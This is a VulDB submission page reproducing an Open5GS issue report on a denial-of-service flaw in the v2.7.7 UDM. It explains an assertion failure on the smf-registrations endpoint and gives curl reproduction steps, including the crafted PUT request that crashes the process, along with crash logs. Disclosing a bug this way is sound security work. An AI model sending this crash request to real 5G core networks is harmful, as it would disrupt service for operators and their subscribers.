Soumettre #806250: Open5gs UDM v2.7.7 Denial of Serviceinformation

Titre	Open5gs UDM v2.7.7 Denial of Service
Description	### Open5GS Release, Revision, or Tag v2.7.7 ### Description UDM crashes when it receives a `nudm-uecm` request for the `smf-registrations` collection without the final `{pduSessionId}` path segment. In the top-level UDM SBI dispatcher, the `SMF_REGISTRATIONS` branch only creates or looks up a `udm_sess_t` when `resource.component[3]` exists. Immediately afterwards it unconditionally executes `ogs_assert(sess)`. That means a syntactically valid request to: ```text /nudm-uecm/v1/{supi}/registrations/smf-registrations ``` reaches the `SMF_REGISTRATIONS` branch with `sess == NULL`, triggering a fatal assertion before the handler can return an HTTP error. ### Steps to reproduce 1. Start the official Open5GS v2.7.7 Docker deployment and make sure the UDM SBI endpoint is reachable. In my live setup the UDM endpoint was `http://10.33.33.6:80`. 2. Prime a UDM UE context for the test SUPI: ```bash curl --http2-prior-knowledge -sS -i \ http://10.33.33.6/nudm-sdm/v2/imsi-001011234567891/am-data ``` 3. Send a minimal valid `SmfRegistration` body to the collection path that omits the required `{pduSessionId}` segment: ```bash payload=$(python3 - <<'PY' import json body = { "smfInstanceId": "smf-test", "pduSessionId": 1, "singleNssai": {"sst": 1, "sd": "000001"}, "dnn": "internet", "plmnId": {"mcc": "001", "mnc": "01"} } print(json.dumps(body, separators=(",", ":"))) PY ) curl --http2-prior-knowledge -v \ -X PUT \ http://10.33.33.6/nudm-uecm/v1/imsi-001011234567891/registrations/smf-registrations \ -H 'content-type: application/json' \ --data "$payload" ``` 4. Check the UDM container state and logs: ```bash docker inspect -f '{{.State.Status}} {{.State.ExitCode}} {{.State.FinishedAt}}' udm docker logs --since 2026-04-10T19:26:55Z udm ``` ### Logs ```shell 04/15 14:43:13.389: [app] INFO: Configuration: '/etc/open5gs/custom/udm.yaml' (../lib/app/ogs-init.c:144) 04/15 14:43:13.390: [app] INFO: File Logging: '/var/log/open5gs/udm.log' (../lib/app/ogs-init.c:147) 04/15 14:43:13.392: [sbi] INFO: Setup NF EndPoint(fqdn) [nrf.open5gs.org:80] (../lib/sbi/context.c:451) 04/15 14:43:13.392: [sbi] INFO: NF Service [nudm-ueau] (../lib/sbi/context.c:1985) 04/15 14:43:13.392: [sbi] INFO: NF Service [nudm-uecm] (../lib/sbi/context.c:1985) 04/15 14:43:13.392: [sbi] INFO: NF Service [nudm-sdm] (../lib/sbi/context.c:1985) 04/15 14:43:13.393: [sbi] INFO: nghttp2_server() [http://udm.open5gs.org]:80 (../lib/sbi/nghttp2-server.c:434) 04/15 14:43:13.393: [app] INFO: UDM initialize...done (../src/udm/app.c:31) 04/15 14:43:13.394: [sbi] INFO: [6e3f9f58-38d9-41f1-874b-298767132c4d] NF registered [Heartbeat:10s] (../lib/sbi/nf-sm.c:341) 04/15 14:43:13.396: [sbi] INFO: Setup NF EndPoint(fqdn) [nrf.open5gs.org:80] (../lib/sbi/nnrf-handler.c:969) 04/15 14:43:13.396: [sbi] INFO: [6e404872-38d9-41f1-83d3-81714110b74b] Subscription created until 2026-04-16T14:43:13.396167+00:00 [duration:86400000000,validity:86400.000000,patch:43200.000000] (../lib/sbi/nnrf-handler.c:888) 04/15 14:43:13.396: [sbi] INFO: Setup NF EndPoint(fqdn) [nrf.open5gs.org:80] (../lib/sbi/nnrf-handler.c:969) 04/15 14:43:13.396: [sbi] INFO: [6e404bec-38d9-41f1-83d3-81714110b74b] Subscription created until 2026-04-16T14:43:13.396239+00:00 [duration:86400000000,validity:86400.000000,patch:43200.000000] (../lib/sbi/nnrf-handler.c:888) 04/15 14:43:13.403: [sbi] INFO: [a9996ea0-38d7-41f1-b953-63be20b73eef] (NRF-profile-get) NF registered (../lib/sbi/nf-sm.c:81) 04/15 14:43:13.403: [sbi] INFO: [UDR] NFInstance associated [a9996ea0-38d7-41f1-b953-63be20b73eef] (../lib/sbi/context.c:2441) 04/15 14:43:13.403: [sbi] INFO: Setup NF EndPoint(fqdn) [udr.open5gs.org:0] (../lib/sbi/context.c:2446) 04/15 14:43:13.403: [sbi] INFO: Setup NF EndPoint(addr) [10.33.33.10:80] (../lib/sbi/context.c:2446) 04/15 14:43:13.403: [sbi] INFO: [nudr-dr] NFService associated [a999de94-38d7-41f1-b953-63be20b73eef] (../lib/sbi/context.c:2109) 04/15 14:43:13.403: [sbi] INFO: Setup NF EndPoint(fqdn) [udr.open5gs.org:0] (../lib/sbi/context.c:2111) 04/15 14:43:13.403: [sbi] INFO: Setup NF EndPoint(addr) [10.33.33.10:80] (../lib/sbi/context.c:2111) 04/15 14:43:20.933: [sbi] INFO: [a9996ea0-38d7-41f1-b953-63be20b73eef] Setup NF Instance [type:UDR] (../lib/sbi/path.c:307) 04/15 14:43:20.975: [udm] FATAL: udm_state_operational: Assertion `sess' failed. (../src/udm/udm-sm.c:235) 04/15 14:43:20.976: [core] FATAL: backtrace() returned 7 addresses (../lib/core/ogs-abort.c:37) open5gs-udmd(+0xeeec) [0x5602d034deec] /usr/local/lib/libogscore.so.2(ogs_fsm_dispatch+0x119) [0x7f3e25b63abc] open5gs-udmd(+0x6243) [0x5602d0345243] /usr/local/lib/libogscore.so.2(+0x12b4f) [0x7f3e25b53b4f] /lib/x86_64-linux-gnu/libc.so.6(+0x94ac3) [0x7f3e25248ac3] /lib/x86_64-linux-gnu/libc.so.6(clone+0x44) [0x7f3e252d9a84] ``` ### Expected behaviour UDM should reject the malformed request with a normal `400` or `404` response instead of aborting the process. ### Observed Behaviour The HTTP/2 stream aborts and the UDM process exits with code `139`. ### eNodeB/gNodeB Not required. ### UE Models and versions Not required.
La source	⚠️ https://github.com/open5gs/open5gs/issues/4419
Utilisateur	FrankyLin (UID 94345)
Soumission	16/04/2026 05:38 (il y a 2 mois)
Modérer	04/05/2026 17:50 (19 days later)
Statut	Accepté
Entrée VulDB	360977 [Open5GS jusqu’à 2.7.7 smf-registrations Endpoint /src/udm/udm-sm.c udm_state_operational déni de service]
Points	20

◂ Précédent Aperçu Suivant ▸

Might our Artificial Intelligence support you?

Check our Alexa App!